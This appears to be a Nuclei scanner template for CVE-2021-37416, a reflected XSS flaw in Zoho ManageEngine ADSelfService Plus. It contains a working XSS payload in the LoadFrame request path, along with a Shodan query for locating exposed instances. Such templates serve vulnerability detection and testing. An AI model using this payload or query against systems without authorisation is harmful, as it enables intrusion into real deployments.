43 lines
1.2 KiB
YAML
43 lines
1.2 KiB
YAML
id: CVE-2021-37416
|
|
|
|
info:
|
|
name: Zoho ManageEngine ADSelfService Plus - Reflected XSS
|
|
author: edoardottt
|
|
severity: medium
|
|
description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-37416
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
shodan-query: http.title:"ManageEngine"
|
|
verified: true
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-37416
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416
|
|
- https://blog.stmcyber.com/vulns/cve-2021-37416/
|
|
tags: cve,cve2021,zoho,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "></iframe><script>alert(1)</script>"
|
|
- "adsf/js/"
|
|
condition: and |